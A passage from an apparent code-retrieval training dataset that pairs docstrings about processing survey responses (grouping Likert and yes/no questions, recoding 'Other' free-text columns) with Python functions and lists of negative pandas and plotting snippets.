"def clean_text(df):\n\n df.replace(r\"\\*\", \"\", regex=True, inplace=True)\n df.replace(r\"\\n\", ' ', regex=True, inplace=True)\n df.replace(r\"\\r\", ' ', regex=True, inplace=True)\n\n # clean_string = trim_whitespace(df)\n # clean_string = lambda x: re.sub(r\"\\[1\\]\", \"\", x).strip() if isinstance(x, str) else x\n return df.applymap(trim_whitespace)",
"def trim_columns(df):\r\n trim_strings = lambda x: x[:-4] if isinstance(x, str) else x\r\n return df.applymap(trim_strings)",
"def parse_col_name(col_name):\n return col_name.upper().strip()",
"def _simplify_features(df):\n simple = [col for col in df.columns if 'error' not in col]\n simple_df = df[simple]\n simple_df.columns = [col.replace(' ', '_') for col in simple]\n \n return simple_df"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
The Y/N questions and the Likert questions can be grouped together to have one plot for each. The Likert questions need to be checked on their answer_format to avoid mixing different types of Likert scales
|
def grouping_likert_yn(group_question):
group_survey_q, group_original_question = list(), list()
previous_answer_format = None
previous_file_answer = None
previous_order_question = None
file_answer = None
for q in group_question:
current_answer_format = group_question[q]['answer_format'].lower()
survey_q = group_question[q]['survey_q']
original_q = group_question[q]['original_question']
file_answer = group_question[q]['file_answer']
order_question = group_question[q]['order_question']
if order_question == 'TRUE':
order_question = True
else:
order_question = False
if previous_answer_format in ['y/n/na', 'likert'] or current_answer_format in ['y/n/na', 'likert']:
if current_answer_format == previous_answer_format or previous_answer_format is None:
if previous_answer_format == 'likert' and current_answer_format == 'likert':
if previous_file_answer != file_answer:
yield group_survey_q, group_original_question, previous_answer_format, previous_file_answer, previous_order_question
group_survey_q, group_original_question = list(), list()
group_survey_q.extend(survey_q)
group_original_question.append(original_q)
else:
yield group_survey_q, group_original_question, previous_answer_format, previous_file_answer, previous_order_question
group_survey_q, group_original_question = list(), list()
group_survey_q.extend(survey_q)
group_original_question.append(original_q)
else:
if len(group_survey_q) > 0:
yield group_survey_q, group_original_question, previous_answer_format, previous_file_answer, previous_order_question
group_survey_q, group_original_question = list(), list()
group_survey_q.extend(survey_q)
group_original_question.append(original_q)
previous_answer_format = current_answer_format
previous_file_answer = file_answer
previous_order_question = order_question
yield group_survey_q, group_original_question, previous_answer_format, file_answer, previous_order_question
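
A small usage sketch, assuming the grouping_likert_yn generator above is in scope; the two questions and their file_answer value are hypothetical:

# Two hypothetical Likert questions that share the same answer file.
group_question = {
    'likert1': {'answer_format': 'likert',
                'survey_q': ['likert1. How satisfied are you?'],
                'original_question': 'How satisfied are you?',
                'file_answer': 'satisfaction_scale.csv',
                'order_question': 'FALSE'},
    'likert2': {'answer_format': 'likert',
                'survey_q': ['likert2. How confident are you?'],
                'original_question': 'How confident are you?',
                'file_answer': 'satisfaction_scale.csv',
                'order_question': 'FALSE'},
}

for survey_qs, original_qs, answer_format, file_answer, order in grouping_likert_yn(group_question):
    if survey_qs:  # the generator can emit an empty leading group before the first question
        print(survey_qs, answer_format, file_answer)
# Both questions use the same Likert scale file, so they are returned as one group.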
|
[
"def scores_vs_rating():\n\n rating_comparison = {\n 1: [], 2: [], 3: [], 4: [], 5: []\n }\n\n rating_key = \"like_rating_specific\"\n\n for user, session in Session.get_users_with_surveys():\n\n boundary = HistogramBoundary(user)\n\n survey = user.get_survey()\n\n for playlist_index, playlist in enumerate(session.recommendations):\n survey_ratings = survey[f\"playlist{playlist_index+1}\"][rating_key]\n\n for track_index, track in enumerate(playlist[\"tracks\"]):\n\n track_rating, _ = boundary.get_boundary_score(track)\n\n survey_rating = int(survey_ratings[f'Song{track_index + 1}'])\n\n rating_comparison[survey_rating].append(track_rating)\n\n result_string = \"\"\n\n for rating_bin, scores in rating_comparison.items():\n result_string += f\"{rating_bin}: {statistics.mean(scores):.3f}, \"\n result_string = result_string[:-2]\n print(result_string)\n\n for rating_bin, scores in rating_comparison.items():\n\n plt.hist(scores, bins=20)\n plt.title(f\"Rating: {rating_bin} (total: {len(scores)})\")\n plt.xlim((0.0, 8.0))\n plt.show()\n\n t_tests = {}\n for i in range(1, 6):\n t_tests[i] = {}\n for j in range(1, 6):\n if i != j:\n\n t_test_score = ttest_ind(\n rating_comparison[i], # [:min_amount],\n rating_comparison[j], # [:min_amount],\n equal_var=False\n )\n t_tests[i][j] = t_test_score[1]\n\n pprint(t_tests)",
"def make_comparison_klg_yhat_plot(yhat, y, klg):\n check_is_array(yhat)\n check_is_array(y)\n check_is_array(klg)\n \n discretized_yhat = discretize_yhat_like_kl_grade(yhat_arr=yhat,\n kl_grade_arr=klg,\n y_col='koos_pain_subscore')\n discretized_vals = range(5)\n \n assert set(klg) == set(discretized_vals)\n assert y.max() == 100\n assert set(discretized_yhat) == set(discretized_vals)\n print('pearson correlation between our original score and y %2.3f' % pearsonr(yhat, y)[0]) \n print('pearson correlation between our discretized score and y %2.3f' % pearsonr(discretized_yhat, y)[0]) \n print('pearson correlation between klg and y %2.3f' % pearsonr(klg, y)[0])\n\n # box plot. \n plt.figure(figsize=[8, 4])\n ylimits = [0, 102]\n plt.subplot(121)\n sns.boxplot(x=discretized_yhat, y=y)\n plt.xlabel(\"Discretized $\\hat y$\")\n plt.ylabel('Koos pain score')\n plt.ylim(ylimits)\n plt.subplot(122)\n sns.boxplot(x=klg, y=y)\n plt.yticks([])\n plt.xlabel(\"KLG\")\n plt.ylim(ylimits)\n plt.savefig('sendhil_plots/klg_yhat_comparison_boxplot.png', dpi=300)\n plt.show()\n \n # plot median value of y by each KLG/yhat bin. \n klg_y_medians = []\n yhat_y_medians = []\n for val in discretized_vals:\n yhat_idxs = discretized_yhat == val\n klg_idxs = klg == val\n print(\"score %i: yhat and KLG means: %2.3f %2.3f; yhat and KLG medians %2.3f %2.3f\" % \n (val, y[yhat_idxs].mean(), y[klg_idxs].mean(), np.median(y[yhat_idxs]), np.median(y[klg_idxs])))\n klg_y_medians.append(np.median(y[klg_idxs]))\n yhat_y_medians.append(np.median(y[yhat_idxs]))\n plt.figure(figsize=[5, 4])\n plt.plot(discretized_vals, yhat_y_medians, label='Our model', color='green')\n plt.plot(discretized_vals, klg_y_medians, label='KLG', color='red')\n plt.legend()\n plt.xticks(discretized_vals)\n plt.ylabel(\"Median Koos pain score\")\n plt.xlabel(\"Severity grade\")\n #plt.savefig('sendhil_plots/klg_yhat_comparison_line_plot.png', dpi=300)\n plt.show()",
"def visualize(answer_data, request_options):\n answers = answer_data['answers']\n return _visualize(answers, request_options, search_mode=bool(answer_data['keyword']))",
"def single_season_sentiment_figure():\n episodes = load_episodes()\n pos_neg_ratios = []\n\n # get the ratios\n for episode in sorted(episodes[1].keys()):\n sentiments = get_episode_sentiment(episodes[1][episode])\n pos_neg_ratios.append(100 * sentiments[0]/ float(sentiments[0] + sentiments[2]))\n\n # plot the figure\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.scatter(range(1, len(episodes[1]) + 1), pos_neg_ratios)\n ax.plot(range(1, len(episodes[1]) + 1), pos_neg_ratios)\n ax.set_xticks(range(1, len(episodes[1])+1))\n ax.set_xlim(0, len(episodes[1]) + 1)\n ax.set_ylim(0,100)\n ax.set_xlabel(\"Episode #\")\n ax.set_ylabel(\"Pos/Neg Sentiment Ratio\")\n ax.set_title(\"Pos/Neg Sentiment Ratios for Season 1 Episodes of 'The West Wing'\")\n plt.tight_layout()\n plt.savefig(\"figures/season_1_posneg_ratios.png\")",
"def sample_answers(y, product_set, p_idk = 0.1, p_2a = 0.3, p_3a = 0.15):\n # Get set of possible questions available in the product catalog\n question_set = set(product_set[\"PropertyDefinitionId\"].values) # faster\n \n # Get dict of (true) answers available for the target product\n quest_answer_y = algo_utils.get_answers_y(y, product_set) \n result = {}\n \n # For each question sample additional answers \n # or replace true answer by idk if necessary.\n for question in question_set:\n # Sample random number b/w 0 and 1.\n u = random.random()\n # Sample if user says idk\n if u < p_idk:\n result[question] = ['idk'] \n # Else if it is possible sample if user give additional answers.\n elif quest_answer_y[question]=='none': #if none you can't have a 2nd answer\n result[question] = [quest_answer_y[question]]\n elif quest_answer_y[question]=='idk': #if none you can't have a 2nd answer\n result[question] = [quest_answer_y[question]] \n # Giving 2 answers?\n elif u < p_idk+p_2a:\n possible = get_all_answers(question, product_set)\n sample = np.random.choice(possible, size=1)\n # If the drawn 2nd answer is the same, redraw one\n while (str(quest_answer_y[question]) in sample.astype(str)): \n sample = np.random.choice(possible, size=1)\n result[question] = np.append([quest_answer_y[question]], sample) \n # Giving 3 answers?\n elif u < p_idk+p_2a+p_3a:\n possible = get_all_answers(question, product_set)\n sample = np.random.choice(possible, size=2, replace=False)\n # If the drawn 2nd or 3rd answer is the same, redraw 2 answers\n while (str(quest_answer_y[question]) in sample.astype(str)):\n sample = np.random.choice(possible, size=2)\n result[question] = np.append([quest_answer_y[question]], sample)\n # Else keep only the true answer \n else:\n result[question] = [quest_answer_y[question]] \n return(result)",
"def tally_answers(results, fieldnames):\n question_tallies = dict().fromkeys(fieldnames)\n for question in question_tallies:\n question_tallies[question] = dict()\n for row in results:\n for question in row:\n if row[question].strip() and row[question].strip() != \"N/A\":\n if row[question].strip() not in question_tallies[question]:\n question_tallies[question][row[question].strip()] = 1\n else:\n question_tallies[question][row[question].strip()] += 1\n return question_tallies",
"def generate_likert_table(labels, questions, form_name=None, help_texts=None, widget=None, use_likert_scale=True,\n make_label_tag=False, **kwargs):\n if not help_texts:\n help_texts = [''] * len(questions)\n\n if not widget:\n widget = widgets.RadioSelect\n\n if len(help_texts) != len(questions):\n raise ValueError('Number of questions must be equal to number of help texts.')\n\n if use_likert_scale:\n field_generator = generate_likert_field(labels, widget=widget)\n header_labels = labels\n else:\n field_generator = partial(models.StringField, choices=labels, widget=widget or widgets.RadioSelectHorizontal)\n header_labels = [t[1] for t in labels]\n\n fields = []\n for (field_name, field_label), help_text in zip(questions, help_texts):\n fields.append((field_name, {\n 'help_text': help_text,\n 'label': field_label,\n 'make_label_tag': make_label_tag,\n 'field': field_generator(),\n }))\n\n form_def = {'form_name': form_name, 'fields': fields, 'render_type': 'table', 'header_labels': header_labels}\n form_def.update(dict(**kwargs))\n\n return form_def",
"def compare_span_to_answer(self,spans,answers,question,question_annotated=None):\n if len(spans)==0:\n return []\n\n\n found_answers = pd.DataFrame(columns=['span','answer','span_index'])\n spans_series = pd.Series(spans)\n pre_proc_answers = []\n answers = [answer.lower().strip() for answer in answers]\n for answer in answers:\n proc_answer = unicodedata.normalize('NFKD', answer).encode('ascii', 'ignore').decode(encoding='UTF-8')\n\n # removing common endings such as \"f.c.\"\n proc_answer = re.sub(r'\\W',' ',proc_answer).lower().strip()\n # removing The, a, an from begining of answer as proposed by SQuAD dataset answer comparison\n if proc_answer.startswith('the '):\n proc_answer = proc_answer[4:]\n if proc_answer.startswith('a '):\n proc_answer = proc_answer[2:]\n if proc_answer.startswith('an '):\n proc_answer = proc_answer[3:]\n\n\n\n pre_proc_answers.append(proc_answer)\n\n\n\n question = question.lower().strip()\n\n # processing question:\n #question_annotated = pd.DataFrame(question_annotated)\n\n # exact match:\n for pre_proc_answer,answer in zip(pre_proc_answers,answers):\n\n if answer in spans:\n exact_match_ind = spans.index(answer)\n found_answers = found_answers.append({'span_index':exact_match_ind,'answer':answer,'span':answer},ignore_index=True)\n\n if pre_proc_answer in spans:\n exact_match_ind = spans.index(pre_proc_answer)\n found_answers = found_answers.append({'span_index': exact_match_ind, 'answer': answer, 'span': pre_proc_answer},ignore_index=True)\n\n # year should match year.\n if question.find('year')>-1:\n year_in_answer = re.search('([1-2][0-9]{3})', answer)\n if year_in_answer is not None:\n year_in_answer = year_in_answer.group(0)\n\n year_spans = spans_series[spans_series == year_in_answer]\n if len(year_spans)>0:\n found_answers = found_answers.append(\n {'span_index': year_spans.index[0], 'answer': answer, 'span': year_in_answer}, ignore_index=True)\n\n\n return found_answers.drop_duplicates()",
"def usage_plot(cohorts):\n\tkmf = lifelines.KaplanMeierFitter()\n\tnorm_column = ['Anxiety', 'Mood', 'Psychosis', 'Sleep', 'Social', 'Medication']\n\tfor cohort in cohorts:\n\t\ttime_vals = []\n\t\test_vals = []\n\t\tfor day_group in cohort.groupby(cohort.index):\n\t\t\t#print(day_group[1][norm_column])\n\t\t\tfor col in norm_column:\n\t\t\t\ttime_vals += day_group[1][day_group[1][col].notnull()][col].index.tolist()\n\t\t\t\test_vals += len(day_group[1][day_group[1][col].notnull()][col].index) * [1]\n\n\t\tkmf.fit(time_vals, est_vals)\n\t\tif 'ax' not in locals(): \n\t\t\tax = kmf.plot() \n\t\telse: ax = kmf.plot(ax=ax)\n\n\tplt.xlabel('Day')\n\tplt.ylabel('Percentage of surveys remaining')\n\t#plt.show()\n\tplt.savefig('test_kmf.png')",
"def plot_responses_by_exp_groups(arr_df, antigen_inds, exp_groups, fig_path=None, fig_prefix=None, fig_size=(18,11), y_lims=[0, 60000]): \n num_groups = len(exp_groups)\n f, axarr = plt.subplots(num_groups,1)\n f.set_size_inches(fig_size)\n\n # plot groups\n if len(exp_groups) == 1:\n i=0\n axarr.plot(np.arange(len(antigen_inds)), arr_df[antigen_inds].iloc[np.where(arr_df['group'] == exp_groups[i])].T)\n axarr.set_title(fig_prefix + \" \" + exp_groups[i] + \" (n = \" + str(len(np.where(arr_df['group'] == exp_groups[i])[0])) + \")\")\n axarr.set_yticks([])\n axarr.set_ylim(y_lims)\n else:\n for i in np.arange(num_groups):\n\n axarr[i].plot(np.arange(len(antigen_inds)), arr_df[antigen_inds].iloc[np.where(arr_df['group'] == exp_groups[i])].T)\n axarr[i].set_title(fig_prefix + \" \" + exp_groups[i] + \" (n = \" + str(len(np.where(arr_df['group'] == exp_groups[i])[0])) + \")\")\n axarr[i].set_yticks([])\n axarr[i].set_ylim(y_lims)\n\n # save to file only if save_flag is on\n if fig_path is not None:\n f.set_tight_layout(True)\n filename = \"\".join([fig_path, fig_prefix, \"_raw_responses_by_groups.png\"])\n f.savefig(filename, dpi=200)",
"def answersummary(self, question, candidates_sentences,\n n=3, qindex=None):\n return self.answersummaries((question, candidates_sentences, n))",
"def averagesclass():\n\tlistofresults=[]\n\tfor i in range(0,user_number):\n\t\tcurrent=list(map(function, data[i][\"responses\"]))\n\t\ta=len(current)\n\t\tfor i in range(0,numquestions-a):\n\t\t\tcurrent.append(0)\n\n\t\tlistofresults.append(current)\n\n\tresults= map(sum, zip(*listofresults))\n\tx_values=[]\n\tfor i in range(1,numquestions+1):\n\t\tx_values.append(i)\n\n\tplt.scatter(x_values, results)\n\tplt.plot(x_values, results)\n\n\tplt.ylim(0,user_number)\n\tplt.xlim(0.5,numquestions+0.5)\n\n\tplt.xticks(list(range(1,numquestions+1)))\n\tplt.xlabel(\"Question Number\")\n\tplt.ylabel(\"Number of Students who got the question Correct\")\n\n\tplt.savefig(\"analytics/class_average.png\")\n\tplt.close()",
"def all_seasons_sentiment_figure():\n episodes = load_episodes()\n # plot pos/neg ratio over the course of all seasons\n season_sentiments = []\n\n # get the ratios\n for i in range(5):\n season_sentiments.append(100* get_season_sentiment(episodes[i+1]))\n\n # plot the figure\n width = 0.35\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.bar(np.arange(0,5,1), season_sentiments, width)\n ax.set_ylim(60, 90)\n ax.set_xticks(np.arange(0,5,1) + width /2.)\n ax.set_xticklabels(np.arange(1,6,1))\n ax.set_xlabel(\"Season #\")\n ax.set_ylabel(\"Pos/Neg Sentiment Ratio\")\n ax.set_title(\"Pos/Neg Sentiment Ratios for First Five Seasons of 'The West Wing'\")\n plt.tight_layout()\n plt.savefig(\"figures/all_seasons_posneg_ratios.png\")",
"def format_question(question):\n correct = '' # check if this is the right way to handle a potential exception.\n answers = question[\"answers\"]\n random.shuffle(answers)\n human_formatted = f'{question[\"q\"]}\\n'\n machine_formatted = f'MC\\t{question[\"q\"]}\\t'\n for i, answer in enumerate(answers):\n machine_formatted += f'{answer[0]} {answer[1]}\\t'\n human_formatted += f' {string.ascii_lowercase[i]}. {answer[0]}\\n'\n if answer[1] == \"correct\":\n correct = string.ascii_lowercase[i]\n return machine_formatted, human_formatted, correct",
"def plot_graph_with_time_and_sentiment_dictionary(time_to_sentiment_dictionary):\n plot_hours = []\n plot_scores = []\n list_of_number_of_tweets_for_the_hour = []\n\n # there are 10 type of sentiment sccore for each tweet\n for k in range(10):\n plot_scores.append([])\n\n for dkey, dvalue in time_to_sentiment_dictionary.items():\n plot_hours.append(dkey)\n list_of_number_of_tweets_for_the_hour.append(dvalue[len(dvalue) - 1])\n index = 0\n for dsentiment_value in dvalue[:-1]:\n plot_scores[index].append(dsentiment_value)\n index += 1\n\n # plot graph of total sentiment score against time\n graph_one = plt.figure(1)\n for k in range(10):\n plt.plot(plot_hours, plot_scores[k])\n plt.title(\"Total Tweets' sentiment scores over time\")\n plt.xlabel('Hours elapsed since first Tweet')\n plt.ylabel('Sentiment score')\n plt.legend(['anger', 'anticipation', 'disgust', 'fear', 'joy', 'negative', 'positive', 'sadness', 'surprise',\n 'trust'], loc = 'upper left', prop={'size': 6})\n\n plt.show()\n\n # plot graph of average sentiment score per tweet against time\n graph_two = plt.figure(2)\n average_sentiment_score_per_tweet = []\n\n avg_index = -1\n for summed_score in plot_scores:\n average_sentiment_score_per_tweet.append([])\n avg_index += 1\n for k in summed_score:\n average_sentiment_score_per_tweet[avg_index].append(k/list_of_number_of_tweets_for_the_hour[avg_index])\n\n for k in range(10):\n plt.plot(plot_hours, average_sentiment_score_per_tweet[k])\n plt.title(\"Average Tweet sentiment scores over time\")\n plt.xlabel('Hours elapsed since first Tweet')\n plt.ylabel('Sentiment score')\n plt.legend(['anger', 'anticipation', 'disgust', 'fear', 'joy', 'negative', 'positive', 'sadness', 'surprise',\n 'trust'], loc = 'upper left', prop={'size': 6})\n\n plt.show()\n\n return",
"def get_question_type(input_q):\n\n # Define keywords\n duration_keywords = ['long', 'duration', 'minutes', 'time', 'length']\n time_keywords = ['century', 'year', 'when', 'month']\n location_keywords = ['country', 'location', 'where', 'coordinates']\n\n # Extract sentence structure\n parse = nlp(input_q)\n lemmas = []\n pos = []\n dep = []\n for word in parse:\n lemmas.append(word.lemma_)\n pos.append(word.pos_)\n dep.append(word.dep_)\n\n sent = parse.text.replace(\"?\", \"\") # Strip question mark\n sent = sent.replace('\"', \"\") # Strip double apostrophe\n sent = sent.replace(\"'\", \"\") # Strip single apostrophe\n\n question_type = \"\"\n if lemmas[0] == \"do\":\n question_type = \"yes/no\"\n else:\n for rel in dep:\n if 'pass' in rel:\n if parse[0].text.lower() == 'by':\n question_type = \"XofY\"\n else:\n question_type = \"passive\" # e.g. 'Which movies are directed by X?'\n break\n else:\n if 'pobj' in rel:\n question_type = \"XofY\" # e.g. 'Who is the director of X?'\n if 'dobj' in rel:\n question_type = \"verb_prop\" # e.g. 'Who directed X?'\n if any(item in duration_keywords for item in lemmas):\n question_type = \"duration\" # e.g. 'How long is X?'\n elif any(item in location_keywords for item in lemmas):\n question_type = \"location\" # e.g. 'Where was X filmed?'\n elif any(item in time_keywords for item in lemmas):\n question_type = \"time\" # e.g. 'When was X published?'\n elif parse[0].text == \"What\" or parse[0].text == \"Which\":\n if parse[1].pos_ == \"NOUN\":\n if \"AUX\" in pos and lemmas[pos.index(\"AUX\")] == \"be\":\n question_type = \"what_A_is_X_Y\" # e.g 'What book is X based on?'\n elif \"AUX\" in pos and lemmas[pos.index(\"VERB\")] == \"earn\":\n question_type = \"what_A_is_X_Y\" # e.g. 'Which movies earned X an award?'\n else:\n question_type = \"what_which_verb\" # e.g. 'What awards did X receive?'\n elif 'about' in lemmas:\n question_type = \"about\"\n else:\n question_type = \"what_is_Xs_Y\" # e.g. 'What is X's hair color?'\n elif \"tall\" in lemmas:\n question_type = \"tall\" # e.g 'How tall is X?'\n elif \"cost\" in lemmas:\n question_type = \"cost\" # e.g. 'How much did X cost to make?'\n elif (\"many\" in lemmas or \"much\" in lemmas) and \"follower\" not in lemmas:\n question_type = \"count\" # e.g. 'How many X films are there?'\n\n return question_type",
"def score_answers(\n self, prompt: Dict[str, np.ndarray], answers: List[Dict[str, np.ndarray]]\n ) -> np.ndarray:",
"def get_metrics_with_answer_stats(long_answer_stats, short_answer_stats):\n\n long_no_answer_wrong = []\n long_has_answer_wrong = []\n long_span_wrong = []\n short_no_answer_wrong = []\n short_has_answer_wrong = []\n short_span_wrong = []\n\n def _get_metric_dict(answer_stats, prefix=''):\n \"\"\"Compute all metrics for a set of answer statistics.\"\"\"\n tp = fp = fn = 0.\n for has_gold, has_pred, is_correct, _, example_id in answer_stats:\n # !!!!!!!!!!!!!\n # is_correct is False as long as gold is null span\n if has_gold and is_correct:\n # TP = the predicted indices match one of the possible ground truth indices\n tp += 1\n elif has_pred and not is_correct:\n # FP = the predicted indices do NOT match one of the possible ground truth indices,\n # OR a prediction has been made where no ground truth exists\n fp += 1\n if not has_gold and prefix == 'long-':\n long_no_answer_wrong.append(example_id)\n if not has_gold and prefix == 'short-':\n short_no_answer_wrong.append(example_id)\n if has_gold and prefix == 'long-':\n long_span_wrong.append(example_id)\n if has_gold and prefix == 'short-':\n short_span_wrong.append(example_id)\n elif not has_pred and has_gold:\n # FN = no prediction has been made where a ground truth exists\n fn += 1\n if prefix == 'long-':\n long_has_answer_wrong.append(example_id)\n if prefix == 'short-':\n short_has_answer_wrong.append(example_id)\n\n f1 = safe_divide(2 * tp, 2 * tp + fp + fn)\n precision = safe_divide(tp, tp + fp)\n recall = safe_divide(tp, tp + fn)\n\n metrics = OrderedDict({\n 'f1': f1,\n 'precision': precision,\n 'recall': recall,\n })\n\n # Add prefix before returning.\n return dict([(prefix + k, v) for k, v in six.iteritems(metrics)])\n\n metrics = _get_metric_dict(long_answer_stats, 'long-')\n metrics.update(_get_metric_dict(short_answer_stats, 'short-'))\n metrics.update(_get_metric_dict(long_answer_stats + short_answer_stats, 'all-'))\n\n with open('wrong_examples.json', 'w') as w:\n json.dump({\n 'long_no_answer_wrong': long_no_answer_wrong,\n 'long_has_answer_wrong': long_has_answer_wrong,\n 'long_span_wrong': long_span_wrong,\n 'short_no_answer_wrong': short_no_answer_wrong,\n 'short_has_answer_wrong': short_has_answer_wrong,\n 'short_span_wrong': short_span_wrong\n }, w, indent=2)\n return metrics",
"def eval(self):\n\n print()\n multi_question = len(self._analogy_questions) > 1\n global_guessed = 0\n global_total = 0\n for i in range(len(self._analogy_questions)):\n questions = self._analogy_questions[i]\n # How many questions we get right at precision@1.\n correct = {i: 0 for i in xrange(ANALOGY_COUNT)}\n skips_map = {i: 0 for i in xrange(ANALOGY_COUNT + 1)}\n\n try:\n total = questions.shape[0]\n except AttributeError as e:\n raise AttributeError(\"Need to read analogy questions.\")\n\n start = 0\n while start < total:\n limit = start + 2500\n sub = questions[start:limit, :]\n idx = self._predict(sub)\n start = limit\n for question in xrange(sub.shape[0]):\n prio = 0\n skips = 0\n for j in xrange(ANALOGY_COUNT):\n if idx[question, j] == sub[question, 3]:\n # Bingo! We predicted correctly. E.g., [italy, rome, france, paris].\n correct[prio] += 1\n break\n elif idx[question, j] in sub[question, :3]:\n # We need to skip words already in the question.\n skips += 1\n continue\n else:\n # The correct label is not the precision@1\n prio += 1\n skips_map[skips] += 1\n accuracy_list = ' '.join('%5.1f%%' % (correct[i] * 100.0 / total) for i in xrange(ANALOGY_COUNT))\n total_skips = sum(skips_map.values())\n skips_list = ' '.join('%5.1f%%' % (skips_map[i] * 100.0 / total_skips) for i in xrange(1, ANALOGY_COUNT + 1))\n guessed = sum(correct.values())\n suffix = ' for #%d' % (i + 1) if multi_question else ''\n output(\"Eval%s %4d/%d accuracy = %5.1f%% [%s] skips [%s]\" % (\n suffix, guessed, total, guessed * 100.0 / total, accuracy_list, skips_list\n ))\n global_guessed += guessed\n global_total += total\n\n if multi_question:\n output(\"Eval global %4d/%d accuracy = %4.1f%%\" % (\n global_guessed, global_total, global_guessed * 100.0 / global_total\n ))"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
When there is an option for 'Other', the column contains the free text typed by the participants. However, to plot later, it is better to recode all these values like the other items, while duplicating them in another column tagged [OTHER_RAW] to keep the information for later. There are two cases in which [Other] columns have been created. 1. In case of a multiple-choice question (several answers can be selected), the value needs to be recoded into 'Yes' and the column kept. 2. In case of a drop-down type of question (only one answer can be selected), the column can simply be renamed with the [OTHER_RAW] tag for later analysis, the value 'Other' being already encoded in the principal question column. The [OTHER_RAW] tag is placed at the beginning of the column name so that these columns are not picked up by grouping_question().
|
def duplicating_other(self, df):
for col in df.columns:
if col[-7:] == '[Other]':
# Duplicate the column
df['[OTHER_RAW]. '+ col] = df[col]
# Replace all the values with 'Yes'
df[col] = df[col].apply(lambda x: 'Yes' if not pd.isnull(x) else np.nan)
            # Dropping the column
df = df.drop(col, axis=1)
return df
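
A minimal standalone sketch of the same recoding step on a toy frame (the column names and toy data are made up for illustration; only the duplicate-then-recode part is shown, without the final drop, so both columns stay visible in the output):

import numpy as np
import pandas as pd

# Toy survey export: one free-text '[Other]' column and one regular item column.
df = pd.DataFrame({
    'Q1 [Other]': ['Stata', np.nan, 'Julia'],
    'Q1 [Python]': ['Yes', 'Yes', np.nan],
})

for col in list(df.columns):
    if col.endswith('[Other]'):
        # Keep the raw free-text answers under a tagged copy of the column ...
        df['[OTHER_RAW]. ' + col] = df[col]
        # ... and recode the original column to 'Yes' / NaN like the other items.
        df[col] = df[col].apply(lambda x: 'Yes' if not pd.isnull(x) else np.nan)

print(df)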
|
[
"def choice_col(self):\n return 'chosen'",
"def tidy_dic():\n #defining path for data\n fname = os.path.join(data_path, \"gardner_time_to_catastrophe_dic_tidy.csv\")\n\n #read csv\n df = pd.read_csv(fname)\n\n # Since just True or False on a plot legend doesn't make much sense, we'll create a column, \n #```tubulin_labeled```, that converts the ```True``` and ```False``` values from the \n #```labeled``` column to ```'labeled tubulin'``` and ```'microtubules'```\n df['tubulin_labeled'] = [\n 'labeled tubulin' if df.labeled[i] else 'microtubules' \n for i in range(len(df.labeled))\n ]\n return df",
"def label_other(self, event):\n setattr(self, 'user_action', 'Other')\n\n # In this case, promt the user for more information\n ## protect against clicking a button crashing the program by defaulting to Unsure\n try:\n user_comment = input(\"\\nUser Comment: \")\n except RuntimeError:\n user_comment = \"double click\"\n print(\"Please don't double click on the 'Other' button. \"\n \"Image has been labeled as 'Unsure' to prevent crash. \"\n \"Press enter to continue.\")\n print(\"You can use the 'Back' button to redo the image\")\n setattr(self, 'user_action', 'Unsure')\n\n setattr(self, 'user_comment', user_comment)\n\n plt.close()\n return",
"def create_lemmatized_question_answer_column(self):\n log.debug(f'Entering: \"{inspect.currentframe().f_code.co_name}\"')\n self.df['clean_question'] = self.df['Question'].swifter.apply(\n self.clean_sentence,\n args=(True,)\n )\n self.df['clean_answer'] = self.df['Answer'].swifter.apply(\n self.clean_sentence,\n args=(True,)\n )\n log.debug(f'Leaving: \"{inspect.currentframe().f_code.co_name}\"')",
"def pref_type(row):\n if \"Personal\" in row['variable']:\n return \"Personal\"\n elif \"Professional\" in row['variable']:\n return \"Professional\"\n else:\n return \"Industry\"",
"def default_preprocessing(df):\n def race(row):\n if ((row['HISPANX'] == 2) and (row['RACEV2X'] == 1)): #non-Hispanic Whites are marked as WHITE; all others as NON-WHITE\n return 'White'\n return 'Non-White'\n\n df['RACEV2X'] = df.apply(lambda row: race(row), axis=1)\n df = df.rename(columns = {'RACEV2X' : 'RACE'})\n\n df = df[df['PANEL'] == 21]\n\n # RENAME COLUMNS\n df = df.rename(columns = {'FTSTU53X' : 'FTSTU', 'ACTDTY53' : 'ACTDTY', 'HONRDC53' : 'HONRDC', 'RTHLTH53' : 'RTHLTH',\n 'MNHLTH53' : 'MNHLTH', 'CHBRON53' : 'CHBRON', 'JTPAIN53' : 'JTPAIN', 'PREGNT53' : 'PREGNT',\n 'WLKLIM53' : 'WLKLIM', 'ACTLIM53' : 'ACTLIM', 'SOCLIM53' : 'SOCLIM', 'COGLIM53' : 'COGLIM',\n 'EMPST53' : 'EMPST', 'REGION53' : 'REGION', 'MARRY53X' : 'MARRY', 'AGE53X' : 'AGE',\n 'POVCAT16' : 'POVCAT', 'INSCOV16' : 'INSCOV'})\n\n df = df[df['REGION'] >= 0] # remove values -1\n df = df[df['AGE'] >= 0] # remove values -1\n\n df = df[df['MARRY'] >= 0] # remove values -1, -7, -8, -9\n\n df = df[df['ASTHDX'] >= 0] # remove values -1, -7, -8, -9\n\n df = df[(df[['FTSTU','ACTDTY','HONRDC','RTHLTH','MNHLTH','HIBPDX','CHDDX','ANGIDX','EDUCYR','HIDEG',\n 'MIDX','OHRTDX','STRKDX','EMPHDX','CHBRON','CHOLDX','CANCERDX','DIABDX',\n 'JTPAIN','ARTHDX','ARTHTYPE','ASTHDX','ADHDADDX','PREGNT','WLKLIM',\n 'ACTLIM','SOCLIM','COGLIM','DFHEAR42','DFSEE42','ADSMOK42',\n 'PHQ242','EMPST','POVCAT','INSCOV']] >= -1).all(1)] #for all other categorical features, remove values < -1\n\n def utilization(row):\n return row['OBTOTV16'] + row['OPTOTV16'] + row['ERTOT16'] + row['IPNGTD16'] + row['HHTOTD16']\n\n df['TOTEXP16'] = df.apply(lambda row: utilization(row), axis=1)\n lessE = df['TOTEXP16'] < 10.0\n df.loc[lessE,'TOTEXP16'] = 0.0\n moreE = df['TOTEXP16'] >= 10.0\n df.loc[moreE,'TOTEXP16'] = 1.0\n\n df = df.rename(columns = {'TOTEXP16' : 'UTILIZATION'})\n return df",
